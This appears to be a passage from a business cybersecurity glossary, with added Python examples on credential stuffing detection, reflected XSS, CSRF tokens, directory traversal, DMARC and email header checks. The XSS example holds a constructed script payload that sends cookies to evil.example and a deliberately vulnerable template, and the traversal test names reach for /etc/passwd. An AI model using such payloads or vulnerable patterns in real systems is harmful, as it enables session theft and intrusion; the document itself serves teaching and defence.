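The following is an added example, not code from the glossary, serving both the Brute Force Attack and Credential Stuffing entries: detection logic run over constructed authentication log lines that tells the two apart by the shape of the failures. Many failures against one account from a source is brute force; one or two failures each across many different accounts from a source is credential stuffing, and a success after such a burst marks an account that has probably been taken over. The log format, IP addresses, thresholds and user names are assumed for the example.

```python
"""Tell brute force from credential stuffing in auth logs (added example).
Log format, addresses and thresholds are constructed, not from the glossary."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<res>ok|fail)$")


def _entry(ts, ip, user, res):
    return f"{ts.isoformat()} ip={ip} user={user} result={res}"


T0 = datetime(2024, 3, 1, 10, 0, 0)
SAMPLE_LOG = (
    # 203.0.113.5: 30 failures against one account in 30 seconds (brute force)
    [_entry(T0 + timedelta(seconds=i), "203.0.113.5", "alice", "fail") for i in range(30)]
    # 198.51.100.9: one attempt per account across 25 accounts, then one succeeds
    + [_entry(T0 + timedelta(seconds=i), "198.51.100.9", f"user{i:02d}", "fail") for i in range(25)]
    + [_entry(T0 + timedelta(seconds=40), "198.51.100.9", "user07", "ok")]
    # 192.0.2.1: a real user who mistypes once
    + [_entry(T0 + timedelta(seconds=5), "192.0.2.1", "dave", "fail"),
       _entry(T0 + timedelta(seconds=9), "192.0.2.1", "dave", "ok")]
)


def classify(lines, window=timedelta(minutes=5), min_failures=10, spread=0.8):
    """Return {ip: (verdict, accounts_that_then_succeeded)} for noisy sources.

    spread is the fraction of failures that hit a *distinct* account: near 1.0
    means one try per account (stuffing); near 0 means one account hammered.
    """
    per_ip = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if m:
            per_ip[m["ip"]].append((datetime.fromisoformat(m["ts"]), m["user"], m["res"]))

    verdicts = {}
    for ip, events in per_ip.items():
        events.sort()
        start = events[0][0]
        fails = [u for t, u, r in events if r == "fail" and t - start <= window]
        if len(fails) < min_failures:
            continue                                  # ordinary user noise
        if len(set(fails)) / len(fails) >= spread:
            verdict = "credential-stuffing"
        else:
            verdict = "brute-force"
        taken_over = sorted({u for t, u, r in events if r == "ok"})
        verdicts[ip] = (verdict, taken_over)
    return verdicts


if __name__ == "__main__":
    for ip, (verdict, users) in classify(SAMPLE_LOG).items():
        print(ip, verdict, "compromised:", users or "none")
```

The point of the distinct-account ratio is that an account lockout policy would never fire for 198.51.100.9 (each account saw a single failure); the signal only exists when failures are grouped by source rather than by account.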
Cross Site Scripting Attack – Cross-Site Scripting (XSS) attacks occur when:
- Data enters a Web application through an untrusted source, most frequently a web request.
- The data is included in dynamic content that is sent to a web user without being validated, or encoded for the context it lands in (HTML body, attribute, JavaScript or URL).
The victim’s browser then runs the attacker’s script with the privileges of the site, which can expose session cookies, perform actions as the user or rewrite the page. The primary defence is context-appropriate output encoding, backed by a Content Security Policy.
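The following is an added example, not code from the glossary: a Python rendering of the two conditions above, with the vulnerable template beside its fixed form. The search page, the parameter name and the payload (which would send the victim's cookie to an attacker's host) are constructed; only the request URL is handled here, not a real server.

```python
"""Reflected XSS: vulnerable template next to the output-encoded fix
(added example; the page, parameter name and payload are constructed)."""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed payload: a script that ships document.cookie to the attacker
PAYLOAD = '<script>fetch("https://evil.example/?c="+document.cookie)</script>'
# The link a phishing email would carry; the browser sends this to the real site
ATTACK_URL = "/search?" + urlencode({"q": PAYLOAD})


def _query_param(url: str, name: str) -> str:
    """Untrusted input entering the application (condition 1)."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(url: str) -> str:
    """Untrusted data copied into HTML unchanged (condition 2)."""
    q = _query_param(url, "q")
    return f"<h1>Results for {q}</h1>"


def render_fixed(url: str) -> str:
    """Same page with output encoding for the HTML body context."""
    q = _query_param(url, "q")
    return f"<h1>Results for {html.escape(q, quote=True)}</h1>"


def executes_script(page: str) -> bool:
    """Crude check a browser would agree with: is there a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(ATTACK_URL))
    print("fixed:     ", render_fixed(ATTACK_URL))
```

html.escape is correct only for text placed in the HTML body or a quoted attribute; data dropped into a JavaScript block, a URL or a CSS rule needs that context's own encoding, which is why templating engines with auto-escaping are preferred over hand-built strings.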
Cross Site Request Forgery Attack – (CSRF) This is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
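The following is an added example, not code from the glossary: a Python model of the CSRF defence a site would apply to the funds transfer described above. The browser attaches the victim's session cookie to the forged request automatically, so the check relies on two things the attacker's page cannot supply: a token tied to the session and a same-origin Origin header. The site name, session id, secret and request structure are constructed.

```python
"""CSRF defence: session-bound synchronizer token plus an Origin check
(added example; site, session ids, secret and request shape are constructed)."""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_SECRET = secrets.token_bytes(32)   # constructed; persist and rotate in practice
SITE_ORIGIN = "https://bank.example"


def csrf_token_for(session_id: str) -> str:
    """Token derived from the session so it cannot be reused across sessions."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _same_origin(value: str) -> bool:
    given, ours = urlsplit(value), urlsplit(SITE_ORIGIN)
    return (given.scheme, given.netloc) == (ours.scheme, ours.netloc)


def allow_state_change(request: dict) -> bool:
    """request: {'method', 'headers', 'cookies', 'form'}. True only for genuine posts."""
    if request["method"].upper() in ("GET", "HEAD", "OPTIONS"):
        return True            # safe methods must not change state, so no token needed
    headers = request["headers"]
    source = headers.get("Origin") or headers.get("Referer")
    if not source or not _same_origin(source):
        return False           # cross-site page (or stripped headers): refuse
    session_id = request["cookies"].get("session")
    if not session_id:
        return False
    token = request["form"].get("csrf_token", "")
    return hmac.compare_digest(token, csrf_token_for(session_id))


def legitimate_request() -> dict:
    sid = "sess-1234"
    return {"method": "POST", "headers": {"Origin": SITE_ORIGIN},
            "cookies": {"session": sid},
            "form": {"to": "ACCT 4242", "amount": "500", "csrf_token": csrf_token_for(sid)}}


def forged_request() -> dict:
    # The victim's browser adds the cookie for us, but the attacker's page
    # neither knows the token nor can it make the browser send our Origin.
    return {"method": "POST", "headers": {"Origin": "https://evil.example"},
            "cookies": {"session": "sess-1234"},
            "form": {"to": "ACCT 6666", "amount": "500"}}


if __name__ == "__main__":
    print("legitimate:", allow_state_change(legitimate_request()))
    print("forged:    ", allow_state_change(forged_request()))
```

Marking the session cookie SameSite=Lax or Strict adds a third, independent layer, because the browser then withholds the cookie from cross-site POSTs altogether.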
Crowdfunding scams – See Donation Scam.
Cryptography – This is the science of protecting information by transforming it (encryption) so that no one but a party holding the correct key can read it, and of proving that information is genuine and unaltered (signatures and message authentication codes). These techniques are widely used in Wi-Fi and to protect data in transit and at rest.
Cryptocurrency – This is a form of electronic currency that uses cryptography for security. Typically a cryptocurrency is a decentralised asset that is managed using blockchain technology, which is a distributed ledger of all transactions in the cryptocurrency. Some merchants accept payments in cryptocurrencies. Cryptocurrency is often used to pay ransoms resulting from Ransomware attacks and for other illegal activities on the dark web. However, dealing in cryptocurrency is legal in most countries. Cryptocurrencies you may have heard about are:
- Bitcoin (the first and most known one)
Cryptojacking – This is an online threat that hides on a computer or mobile device and uses the machine’s resources to “mine” forms of cryptocurrencies. It can take over web browsers, as well as compromise all kinds of devices, from desktops and laptops, to smart phones and even network servers. Like most other malicious attacks, the motive is profit, but unlike many threats it’s designed to stay completely hidden from the user and often uses tactics to detect when the system is idle (i.e. not actively in use) so as to mask its activity.
Cryptocurrency Mining – This is the computational process whereby transactions in Cryptocurrency are verified and entered into the distributed ledger called the Blockchain. For more info on this, see this Forbes Article.
Cyber Attack – This is any attempt to expose, alter, disable, destroy, steal or gain unauthorized access to or make unauthorized use of a computer system. There are various forms of Cyber Attack, and the following list is just examples
- Brute Force Attack/Dictionary Attack
- Business Email Compromise Attack
- Click Jacking
- Cookie Stuffing
- Credential Stuffing
- Data Breaches
- Denial of Service (DoS)
- Distributed Denial of Service (DDoS)
- DLL Hijacking
- Elevation of Privilege
- Keystroke Logging
- Social Engineering
Modern cyber attacks often don’t rely on just one attack vector: they frequently chain various vulnerabilities and attack vectors to achieve their goal.
Cyber Attack Vector – This is, loosely, the method a cyber criminal uses to attack their victim. Social Engineering is one example of a Cyber Attack Vector, but there are many others that a hacker can use to exploit vulnerabilities in the computer system they are attacking.
Cyber-Enabled Fraud – This is often referred to as Business Email Compromise (BEC) and is defined as a sophisticated scam targeting businesses working with foreign suppliers and/or businesses that regularly perform payments, including cross-border payments. These scams have evolved to also target Personally Identifiable Information (PII) of employees of clients. These scams can also target individuals (e.g. real-estate purchasers, the elderly) by convincing them to make payments to bank accounts controlled by criminals.
See also Fraud and Business Email Compromise Attack and Social Engineering.
Cyber Espionage – This is spying on the computer systems of an organization with the help of a virus or other malware, to steal or destroy data. This is often done as part of industrial espionage as well as nation state espionage.
Cyber Incident – This is a breach of the security rules for a system or service. For example:
- Data Breach
- Unauthorised Access to a system
- Infiltration by Malware, Ransomware, Crypto Miners, etc.
- Changes to system firmware, operating systems or application software
- Disruption and/or Denial of Service
Cyber Squatting – This is registering, trafficking in, or using an Internet domain name with bad faith intent to profit from the goodwill of a trademark belonging to someone else. The cybersquatter then offers to sell the domain to the person or company who owns a trademark contained within the name at an inflated price. See also Domain Typo Squatting.
Cyber Security Incident Response Team (CSIRT) – A cyber security incident response team (CSIRT) consists of the people who will handle the response to an incident (e.g. a data breach, ransomware attack). It may include both internal and external teams and may differ based on the nature of the incident. The core team will usually be IT or Cyber Security specialists. The extended team may include other capabilities, such as PR, HR and legal. The team does not have to be full time. It is more cost effective to have a ‘virtual’ CSIRT, pulled together when needed, from people who have other day jobs.
Cyber War Games – This allows executives and employees to practice their response to simulated crises caused by hacks or malware. Typically a team within an organisation will think like attackers and imagine doomsday scenarios that could cripple the organisation and its ability to function. Scenarios are fictitious, but realistic, and based on the latest threat intelligence about what “bad actors” are up to. War games are an opportunity to be proactive and simulate high-pressure situations, so that an organisation is not caught off guard in the middle of a crisis.
Data Asset – This is any entity that is comprised of data; for example, a database, file, document, system or application output file, or web page. Data assets can also be a service that may be provided to access data from an application.
Data At Rest – This describes data in persistent storage such as hard disks, removable media or backups. Data at rest can be in an encrypted form (preferred) or unencrypted.
Data Breach – This is where a cyber attacker has gained access to a cache of information (typically an unsecured database of some form) and extracts private information. This could typically be user names, passwords, postal addresses, credit card numbers, medical records among many others. The purpose of data breaches is to gain access to private information so that it can be exploited in other cyber attacks, for example social engineering, credential stuffing.
Data Classification – This is a data management process that involves categorizing and organizing data into different classes based on their forms, types, importance, sensitivity, and usage in an organization.
Data Custodian – This is typically an executive of an organization entrusted with the responsibilities of data administration, as such protecting and safeguarding data is the primary responsibility of Data custodian.
Data Encryption Standard (DES) – This is a symmetric block cipher algorithm, published as a US federal standard in the 1970s, that converts plain text to cipher text using a 56-bit key. That key length is now far too short to resist a brute force attack, so DES has been superseded by the Advanced Encryption Standard (AES).
Data in Transit – This describes data that is being moved from one storage location to another or for use in a processing application. Data in Transit should be encrypted using HTTPS or other encryption technologies.
Data Leakage – This is the unauthorized transmission of data from within an organization to an external destination or recipient. The term can be used to describe data that is transferred electronically or physically. Data leakage threats usually occur via the web and email, but can also occur via mobile data storage devices such as optical media, USB keys, and laptops.
Data Owner – This is an executive of an organization entrusted with administrative control of the data. Such an individual has complete control over the data and can control or limit access to it, assign permissions, etc.; they are also accountable for the accuracy and integrity of that data.
Data Retention – This is the process of storing and protecting data for historical reasons and for data back up when needed. Every organization has its own rules governing data retention within the organization.
Data Retention Period – This is the period for which data is required to be retained and can be dictated by regulations (e.g. GDPR) as well as other regulatory bodies (e.g. FSA in financial services in the UK). Once data has exceeded its data retention period it should be irretrievably destroyed.
Debt Collection Scam – Scammers call people, threatening them about a debt they supposedly owe and telling them that if they don’t pay immediately they will be prosecuted or have bailiffs sent to recover the debt. In most cases this is a non-existent debt.
Decryption – This is the opposite of Encryption (see below) where a recipient of an encrypted message can use the same algorithm used to encrypt it to decrypt it.
Decryption Key – This is a token that is known to one or both parties in an encrypted exchange and is used to decrypt an encrypted message or device.
Deepfake – A combination of the terms “deep learning” and “fake”, deepfakes are persuasive-looking but false video and audio files. Made using cutting-edge and relatively accessible AI technology, they purport to show a real person doing or saying something they did not. This is of particular concern when used to distribute fake news and/or disinformation, especially in a political election. See our guidance on Deep Fakes.
Defence in Depth – This is the process of creating multiple layers of security to protect electronics and information resources against attackers. Also called the Castle approach, it is based on the principle that in the event of an attack, even if one layer fails to protect the information resource other layers can offer defence against the attack.
Demultiplexing – The reverse process of Multiplexing.
Denial of Service (DoS) – This is a form of cyber attack that attempts to take legitimate services (e.g. game sites, shopping sites) offline by flooding them with requests. The flood of requests is so great that the host systems cannot cope with the inbound traffic, and either slow to a halt or crash totally. Think of this as being in a crowded/noisy room and you are trying to hear someone talking to you where even if they are shouting you cannot hear them. This form of attack is often perpetrated by criminals out to either destroy, or at the very least disrupt a service.
DevOps – This is a set of software development practices that combine software development (Dev) and information technology operations (Ops) to shorten the systems development life cycle while delivering features, fixes, and updates frequently in close alignment with business objectives.
Dictionary Attack – This is a more refined form of Brute Force Attack (see above) where the attacker uses words and known substitution patterns to crack a password so as to gain access to a computer system. This is in contrast to a phrase attack.
Digital Certificate – This is a piece of information that guarantees that the sender is verified and genuine, and is the person they claim to be. Otherwise known as public key information, a digital certificate issued by a Certificate Authority helps exchange information over the internet in a safe and secure manner.
Digital Footprint – This is the trail of information left behind by a person’s online activity. This can consist of cookies, tracking information, payments, web searches and location information, to name a few.
Digital Forensics – This is a branch of forensic science (sometimes known as digital forensic science) encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime.
Digital Signature – This is an electronic code that guarantees the authenticity of the sender of information as being who they claim to be, and that the information sent is first-hand, without any alterations. Digital signatures use the private key of the sender and cannot easily be imitated or forged.
Directory Traversal Vulnerability – This kind of bug can allow a malicious attacker to upload and plant files on a system in unexpected system locations. If the attacker can fine-tune the attack, he can control the places where the malicious files can end up. There are several locations on a Windows or Linux system where the uploaded files could be executed automatically, leading to a situation where the attacker could run malicious code and take over vulnerable servers entirely.
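The defensive side of the entry above, as an added example that is not part of the glossary: a naive upload-path join next to a hardened one that normalises the joined path and refuses any name that would land outside the upload directory. The upload root is a hypothetical path, and the check uses POSIX path rules.

```python
# Added example (not from the glossary): a naive upload path join next to a
# hardened one that refuses any name escaping the upload directory.
import posixpath

# Hypothetical upload root for the illustration.
UPLOAD_DIR = "/srv/app/uploads"


def naive_upload_path(filename: str) -> str:
    """VULNERABLE: trusts the client-supplied name verbatim.

    A name such as "../../etc/passwd" is joined as-is, so the "../"
    segments walk out of UPLOAD_DIR when the OS opens the file.
    """
    return posixpath.join(UPLOAD_DIR, filename)


def safe_upload_path(filename: str) -> str:
    """Hardened: normalise the joined path and insist it stays under UPLOAD_DIR.

    posixpath.join() discards the base when the name is absolute, and
    normpath() collapses "." and ".." segments, so after both steps a
    prefix check on the directory boundary (base + "/") is enough.  The
    trailing "/" stops a sibling such as "/srv/app/uploads2" from passing.
    Raises ValueError for anything outside the upload root.
    """
    base = posixpath.normpath(UPLOAD_DIR)
    candidate = posixpath.normpath(posixpath.join(base, filename))
    if candidate == base or not candidate.startswith(base + "/"):
        raise ValueError(f"upload name escapes {base}: {filename!r}")
    return candidate


def is_traversal_attempt(filename: str) -> bool:
    """Detection helper: True when safe_upload_path() would reject the name.

    Useful for logging and alerting on upload endpoints even where the
    hardened join is already in place.
    """
    try:
        safe_upload_path(filename)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for name in ["report.pdf", "a/../b.txt", "../../etc/passwd", "/etc/passwd", "../uploads2/x"]:
        print(f"{name!r:20} naive -> {naive_upload_path(name):40} "
              f"traversal? {is_traversal_attempt(name)}")
```

On a live filesystem, resolve the final path with os.path.realpath as well, so that a symbolic link placed inside the upload directory cannot point the write somewhere else.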
Disaster Recovery Plan (DRP) – Sometimes called a Business Continuity Plan (BCP), this prescribes the steps required to carry on business as usual in the event of a disaster. A disaster recovery plan aims to bring business activities back to normal in the shortest possible time; such efforts require an in-depth study and analysis of business-critical processes and their continuity needs. Business continuity plans also prescribe preventive measures to avoid disasters in the first place.
Discretionary Access Control – This is a security measure by which the owner can restrict access to resources such as files, devices and directories to specific users or user groups based on their identity. It is at the owner’s discretion to permit or restrict users from accessing the resources completely or partially.
Distributed Denial of Service (DDoS) – This is an evolution of a Denial of Service attack where the source of the traffic flooding a website is coming from multiple sources. DDoS attacks can happen in two primary ways:
- Where specially crafted data is sent to a server that it is not set up to handle, and therefore crashes or goes into an endless processing loop
- Flooding, where too much data/requests are sent to a server which slows it down so that it cannot process legitimate requests, or even crashes under the load.
Domain Typo Squatting – This is a form of cybersquatting which relies on mistakes such as typographical errors made by Internet users when inputting a website address into a web browser. See our guidance on Domain Typo Squatting. Also known as URL hijacking. See also Cyber Squatting.
Domain Name Service (DNS) – This is essentially a phone book for the internet. You type in an address for a website (e.g. https://www.imdb.com) and the DNS service used by your computer translates that into a numerical address (an IP address, similar to 192.168.25.246) that your web browser can use to access the website. In accessing a web page your browser makes many (sometimes 100 or more) requests for resources on the internet, ranging from the actual content you want to see to structural entities you will never see, as well as ads, graphics, videos and download items. DNS queries are typically sent over an unencrypted protocol (UDP) that is open for anyone to see, even if the website you are accessing is encrypted (https). There is a very good Wikipedia article describing what DNS is at a more technical level.
Domain Name System (DNS) Exfiltration – This is a difficult-to-detect, lower-level cyber attack on DNS servers to gain unauthorized access.
DNS over HTTPS (DoH) – This is a secure means of executing DNS queries instead of the insecure and unencrypted protocol used today (UDP). DNS queries are encoded over HTTPS and are therefore encrypted.
DNS Rebinding Attack – As part of accessing a website, your web browser will do a Domain Name lookup to translate the textual URL (for example https://jmbusinesssecurity.co.uk/) to an IP address like 188.8.131.52 (IPv4). The IP address is bound to the website you want to go to via the DNS service you are using. In a DNS Rebinding Attack, malware residing on the network, or possibly in your router, intercepts this request and then assigns a different IP address that redirects you to the cyber criminal’s malicious site. This is why HTTPS is so important, since it also requires the certificates to line up. Secure DNS will also mitigate this, since most DNS queries occur using an unencrypted service.
DNS over TLS (DoT) – This is a protocol for encrypting and wrapping DNS queries and their replies in TLS (Transport Layer Security). This offers both privacy via TLS encryption and authentication via TLS support for the entire public key infrastructure. So this prevents eavesdropping and any manipulation of DNS data via man-in-the-middle attacks.
DNSSec – This provides cryptographically signed DNS records, which allows a DNSSec-aware operating system (e.g. Windows, MacOS, Android) to verify that the DNS response received has not been tampered with or altered in any way. Since the DNS reply is signed with a private key which no forger can have, the received DNS reply is authentic. However, DNSSec on its own does NOT encrypt, and anyone watching the traffic will see the DNS client’s queries and their replies just as if DNSSec was not in use. If you want to learn more about DNSSec in Windows then please look at this Microsoft blog on the subject (from Windows 7 onward, Windows was DNSSec aware, but your actual DNS service might not be; take a look at this resource and test your setup).
Domain-based Message Authentication, Reporting & Conformance (DMARC) – This is an authentication protocol that validates an email sender’s identity using the DKIM (DomainKeys Identified Mail) and SPF (Sender Policy Framework) standards. DMARC users also set a policy for what should happen to emails that don’t pass the validation. “Reject” is the strongest setting, which blocks suspicious emails; users can instead request “quarantine”, which sends dubious messages into a spam or junk mailbox. (“None” is the third option, which results in no action being taken.)
DomainKeys Identified Mail (DKIM) – This is an email authentication method designed to detect forged sender addresses in emails. DKIM allows the receiver to check that an email claimed to have come from a specific domain was indeed authorized by the owner of that domain. It achieves this by affixing a digital signature, linked to a domain name, to each outgoing email message. The recipient system can verify this by looking up the sender’s public key published in DNS. A valid signature also guarantees that some parts of the email (possibly including attachments) have not been modified since the signature was affixed. Usually, DKIM signatures are not visible to end users, and are affixed or verified by the infrastructure rather than by the message’s authors and recipients.
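How a receiving mail server turns the DMARC and DKIM entries above into a decision, as an added example that is not from the glossary: it parses a published DMARC record, checks whether the SPF-authenticated domain and the DKIM signing domain are aligned with the From header domain under the record's strict or relaxed settings, and returns either pass or the policy to apply. The record, domains and authentication results are constructed, and the organisational-domain logic is simplified to the last two labels (real receivers use the Public Suffix List).

```python
# Added example (not from the glossary): parse a DMARC TXT record and apply
# its policy to one message, given SPF and DKIM results the receiver has
# already computed.  All records and domains below are constructed.
from typing import Dict


def parse_dmarc_record(txt: str) -> Dict[str, str]:
    """Split 'tag=value; tag=value' into a dict and fill in DMARC defaults."""
    tags: Dict[str, str] = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a valid DMARC record")
    tags.setdefault("adkim", "r")      # relaxed DKIM alignment unless stated
    tags.setdefault("aspf", "r")       # relaxed SPF alignment unless stated
    tags.setdefault("sp", tags["p"])   # subdomain policy defaults to p
    return tags


def org_domain(domain: str) -> str:
    """Organisational domain, approximated as the last two labels.

    Assumption of this example: real receivers consult the Public Suffix
    List so that names like 'example.co.uk' are handled correctly.
    """
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_aligned(auth_domain: str, from_domain: str, mode: str) -> bool:
    """Strict ('s') alignment needs an exact match; relaxed ('r') needs
    only the same organisational domain."""
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


def dmarc_disposition(record: str, from_domain: str,
                      spf_result: str, spf_domain: str,
                      dkim_result: str, dkim_domain: str) -> str:
    """Return 'pass', or the policy to apply: 'none', 'quarantine' or 'reject'.

    spf_domain is the MAIL FROM (Return-Path) domain SPF was checked against;
    dkim_domain is the d= tag of the signature that verified.
    """
    tags = parse_dmarc_record(record)
    spf_ok = spf_result == "pass" and is_aligned(spf_domain, from_domain, tags["aspf"])
    dkim_ok = dkim_result == "pass" and is_aligned(dkim_domain, from_domain, tags["adkim"])
    if spf_ok or dkim_ok:
        return "pass"
    # The record is assumed to be published at the organisational domain, so a
    # From header on a subdomain falls under sp= rather than p=.
    exact = from_domain.lower() == org_domain(from_domain)
    return tags["p"] if exact else tags["sp"]


if __name__ == "__main__":
    record = "v=DMARC1; p=reject; sp=quarantine; adkim=s; aspf=r; rua=mailto:dmarc@example.com"
    print(dmarc_disposition(record, "example.com", "pass", "bounce.example.com", "fail", ""))
    print(dmarc_disposition(record, "example.com", "pass", "attacker.example", "pass", "mail.example.com"))
```

The second call in the demo shows the point of alignment: SPF and DKIM both pass, but neither authenticated domain lines up with the From header domain, so the message still fails DMARC and the reject policy applies.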
Domain Spoofing – This is a common form of phishing and occurs when an attacker appears to use a company’s domain to impersonate a company or one of its employees. This can be done by sending emails with false domain names which appear legitimate, or by setting up websites with slightly altered characters that read as correct. Commonly, a spoof website or email will use logos, or any other kind of accurate visual design to effectively imitate the styling and branding of a legitimate enterprise or business. Users will commonly be prompted to enter financial details or other sensitive data, trusting that they are being sent to the right place. Domain Spoofing Classifications are:
- Email Spoofing
- Website Spoofing.
It is recommended that users only access financial sites and other sensitive sites directly through a main page or other verified avenue in order to avoid being cheated by a spoof website.
Domain Typo Squatting – These are web addresses that have been deliberately misspelled to look like the legitimate web address (see my blog on this subject).
There are various types of Domain Typo Squatting:
- Misconfigured or illegitimate typosquat domains are described as ones that have not been properly configured and show directory indexes or HTML error messages. Other types of sites that fall under this category are ones that promote content related to the domain name, but not necessarily for the benefit of the organisation.
- Non-malicious typosquat domains are ones that are designed to hurt the brand of the company.
- Redirects, which are unfortunately the most common. These sites will redirect the visitor to scam sites, unwanted and fake Chrome and Firefox browser extensions, fake program updates that install malware, or tech support scams.
Donation Scam – This is where, for example, a person claims they have a child, or someone they know, with an illness and need financial assistance. Although many such claims are real, an alarming number of people create fake accounts on donation sites in the hope of scamming people out of money.
Doorstep Scam/Fraud – This involves someone coming to your home and knocking on the door, with the aim of tricking you out of money. There can be added pressure with face-to-face interaction, which can sometimes be more challenging than dealing with phone scams, postal scams and online scams.
Download Attack – An unintentional download of malicious software (malware) onto a user’s device without their knowing consent. This is often the result of a Malvertising attack.
Drive By Download Attack – This is when a user visits a website and a file download is initiated without the user’s interaction. This technique can be used to distribute unwanted software and malicious programs in the hopes that users will accidentally or mistakenly execute the downloads and get infected. We are finally seeing web browsers implement features to stop this attack.
Dual Use Certificate – This is a digital certificate that is intended for use with both digital signature and data encryption services.
Dynamic Link Library (DLL) – These are extensions of different applications. Any application we use may or may not need certain code. Such code is stored in separate files and is invoked or loaded into RAM only when required. Thus, it saves an application file from becoming too big and prevents resource hogging by the application.
Dynamic Link Library (DLL) Hijacking – This is where an original DLL file is replaced with a fake DLL file containing malicious code. Since DLLs are extensions and necessary for almost all applications on your machine, they are present on the computer in different folders. There are priorities as to where the operating system looks for DLL files. First, it looks in the same folder as the application and then goes searching, based on the priorities set by the environment variables of the operating system. Thus if a good.dll file is in the SysWOW64 folder and someone places a bad.dll in a folder that has higher priority than the SysWOW64 folder, the operating system will use the bad.dll file, as it has the same name as the DLL requested by the application. Once in RAM, it can execute the malicious code contained in the file and may compromise your computer or network.
Eavesdropping – This is the practice of listening, intercepting, or monitoring private communication between users or user groups without their knowledge or permission. See also Wire Tapping.
Edge Computing – This is a distributed computing paradigm that brings computation and data storage closer to the location where it is needed, to improve response times and save bandwidth. This is particularly relevant to IoT devices, where information is gathered in the field (particularly by environmental and security sensors) but then has to be sent to a data centre (often with some delay in transmission and/or analysis). If some compute power is positioned closer to the point of origin, the data is immediately useful. See also Cloud Computing and Cloud.
Electronic signature – This is the process of applying a mark in electronic form with the intent to sign a data object and is used interchangeably with digital signature.
Elevation of Privilege – This results from giving an attacker authorization permissions beyond those initially granted by the user being attacked (e.g. a user may have low level privileges and the elevation gives administrator privileges). This is often achieved by exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. This is always the result of some form of cyber attack.
Elliptic Curve Cryptography – This is a cryptographic technique that uses an elliptic curve equation to create cryptographic keys; keys generated this way are much smaller for the same level of security, as well as faster and more efficient. This modern technique keeps the decryption key private, while the encryption key is public. Unlike traditional methods of generating cryptographic keys, the elliptic curve technique relies on discrete logarithms on the curve, making it difficult to derive or challenge the keys.
Email Account Compromise (EAC) – This is a highly sophisticated cyber attack in which cyber attackers use various tactics (e.g. password spraying, phishing, malware) to compromise victims’ email accounts, gaining access to legitimate mailboxes. EAC also leads to email fraud. In the case of EAC there are almost always two victims: the person whose email account was compromised, and the person who falls for the fraudulent request sent from the compromised account.
Email Fraud – This is the intentional deception made for personal gain or to damage another individual through email where the attacker uses social engineering to trick or threaten the target to make a fraudulent financial transaction. See also Social Engineering.
Email Header – This is the metadata held within an email. Emails consist of two parts: the readable part, and the metadata that deals with the routing of the email, called the email headers. The email headers are not normally seen by a user and are typically coded in a machine-readable format. However, most email clients will allow you to view the headers, which are important in tracking down spoofed emails and phishing attacks.
Email Spoofing – This is where an email header is spoofed so that the message seems to originate from someone or somewhere different from the actual source. Email spoofing is a scheme used in both phishing and spam campaigns because users don’t want to open an email if they don’t trust the legitimacy of the source. The purpose of email spoofing is to trick recipients into opening, or even corresponding with a solicitation.
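Reading the headers the two entries above refer to, as an added example that is not from the glossary: the function below parses a raw message with Python's standard email library, lists the Received hops from the receiving server back to the origin, and flags the mismatches between the From, Return-Path and Reply-To domains that commonly betray a spoofed message. The message is constructed for the illustration and uses reserved documentation names and addresses.

```python
# Added example (not from the glossary): pull routing and sender headers out
# of a raw message and flag the mismatches that often betray spoofing.
# The message below is constructed; hosts and addresses are reserved
# documentation values, not real systems.
import re
from email import message_from_string, policy
from email.utils import parseaddr
from typing import Dict, List

CONSTRUCTED_RAW = """\
Received: from mail.example.com (mail.example.com [203.0.113.10])
    by mx.recipient.example with ESMTPS id 7f3a9c;
    Mon, 01 Jan 2024 10:00:00 +0000
Received: from [198.51.100.7] (unknown [198.51.100.7])
    by mail.example.com with SMTP; Mon, 01 Jan 2024 09:59:58 +0000
Return-Path: <bounce@attacker.example>
From: "Finance Director" <finance.director@example.com>
Reply-To: finance.director@example-payments.example
To: accounts@example.com
Subject: Urgent invoice

Please pay the attached invoice today.
"""


def _domain(header_value) -> str:
    """Domain part of an address header such as 'Name <user@host>' ('' if absent)."""
    _, addr = parseaddr(str(header_value) if header_value else "")
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def analyse_headers(raw: str) -> Dict[str, object]:
    """Summarise the routing and sender headers and list suspicious mismatches."""
    msg = message_from_string(raw, policy=policy.default)   # unfolds headers
    received = [" ".join(str(h).split()) for h in msg.get_all("Received", [])]
    # Each relay prepends its own Received line, so the list runs from the
    # final receiver (first) back to the originating host (last).
    hops = [m.group(1) for m in (re.match(r"from\s+(\S+)", r) for r in received) if m]

    from_domain = _domain(msg["From"])
    return_path_domain = _domain(msg["Return-Path"])
    reply_to_domain = _domain(msg["Reply-To"])

    findings: List[str] = []
    if return_path_domain and return_path_domain != from_domain:
        findings.append(f"Return-Path domain {return_path_domain} differs from From domain {from_domain}")
    if reply_to_domain and reply_to_domain != from_domain:
        findings.append(f"Reply-To domain {reply_to_domain} differs from From domain {from_domain}")

    return {
        "from_domain": from_domain,
        "return_path_domain": return_path_domain,
        "reply_to_domain": reply_to_domain,
        "hops": hops,
        "origin": hops[-1] if hops else "",
        "findings": findings,
    }


if __name__ == "__main__":
    report = analyse_headers(CONSTRUCTED_RAW)
    print("origin host:", report["origin"])
    for finding in report["findings"]:
        print("finding:", finding)
```

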